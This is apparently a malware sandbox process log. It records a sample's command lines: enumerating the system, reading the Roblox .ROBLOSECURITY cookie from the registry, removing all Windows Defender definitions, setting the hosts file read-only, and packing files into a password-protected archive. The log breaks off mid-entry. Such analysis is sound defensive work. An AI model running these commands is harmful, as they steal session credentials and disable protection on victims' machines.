                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:71
                                                                                                                                                                                                                                                                  Start time:03:22:15
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:72
                                                                                                                                                                                                                                                                  Start time:03:22:15
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:73
                                                                                                                                                                                                                                                                  Start time:03:22:15
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:74
                                                                                                                                                                                                                                                                  Start time:03:22:15
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8ED.tmp" "c:\Users\user\AppData\Local\Temp\ppw2wipr\CSC774215641B8D46CBA5382B343227E316.TMP"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff656630000
                                                                                                                                                                                                                                                                  File size:52'744 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:75
                                                                                                                                                                                                                                                                  Start time:03:22:15
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tree /A /F
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b7570000
                                                                                                                                                                                                                                                                  File size:20'992 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:76
                                                                                                                                                                                                                                                                  Start time:03:22:15
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:getmac
                                                                                                                                                                                                                                                                  Imagebase:0x7ff639da0000
                                                                                                                                                                                                                                                                  File size:90'112 bytes
                                                                                                                                                                                                                                                                  MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:77
                                                                                                                                                                                                                                                                  Start time:03:22:15
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6995b0000
                                                                                                                                                                                                                                                                  File size:23'040 bytes
                                                                                                                                                                                                                                                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:79
                                                                                                                                                                                                                                                                  Start time:03:22:16
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:80
                                                                                                                                                                                                                                                                  Start time:03:22:16
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:81
                                                                                                                                                                                                                                                                  Start time:03:22:16
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:82
                                                                                                                                                                                                                                                                  Start time:03:22:16
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:83
                                                                                                                                                                                                                                                                  Start time:03:22:16
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tree /A /F
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b7570000
                                                                                                                                                                                                                                                                  File size:20'992 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:84
                                                                                                                                                                                                                                                                  Start time:03:22:17
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6b4290000
                                                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:85
                                                                                                                                                                                                                                                                  Start time:03:22:18
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:86
                                                                                                                                                                                                                                                                  Start time:03:22:18
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:87
                                                                                                                                                                                                                                                                  Start time:03:22:18
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tree /A /F
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b7570000
                                                                                                                                                                                                                                                                  File size:20'992 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:88
                                                                                                                                                                                                                                                                  Start time:03:22:18
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:89
                                                                                                                                                                                                                                                                  Start time:03:22:18
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:90
                                                                                                                                                                                                                                                                  Start time:03:22:18
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tree /A /F
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b7570000
                                                                                                                                                                                                                                                                  File size:20'992 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:91
                                                                                                                                                                                                                                                                  Start time:03:22:19
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:92
                                                                                                                                                                                                                                                                  Start time:03:22:19
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:93
                                                                                                                                                                                                                                                                  Start time:03:22:19
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tree /A /F
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b7570000
                                                                                                                                                                                                                                                                  File size:20'992 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:94
                                                                                                                                                                                                                                                                  Start time:03:22:19
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:95
                                                                                                                                                                                                                                                                  Start time:03:22:19
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:96
                                                                                                                                                                                                                                                                  Start time:03:22:20
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:97
                                                                                                                                                                                                                                                                  Start time:03:22:21
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7d7e50000
                                                                                                                                                                                                                                                                  File size:468'120 bytes
                                                                                                                                                                                                                                                                  MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:98
                                                                                                                                                                                                                                                                  Start time:03:22:21
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:99
                                                                                                                                                                                                                                                                  Start time:03:22:21
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:100
                                                                                                                                                                                                                                                                  Start time:03:22:21
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:101
                                                                                                                                                                                                                                                                  Start time:03:22:29
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:102
                                                                                                                                                                                                                                                                  Start time:03:22:29
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7934f0000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:103
                                                                                                                                                                                                                                                                  Start time:03:22:29
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *
                                                                                                                                                                                                                                                                  Imagebase:0x7ff695cd0000
                                                                                                                                                                                                                                                                  File size:630'736 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:104
                                                                                                                                                                                                                                                                  Start time:03:22:30
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:105
                                                                                                                                                                                                                                                                  Start time:03:22:30
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:106
                                                                                                                                                                                                                                                                  Start time:03:22:31
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
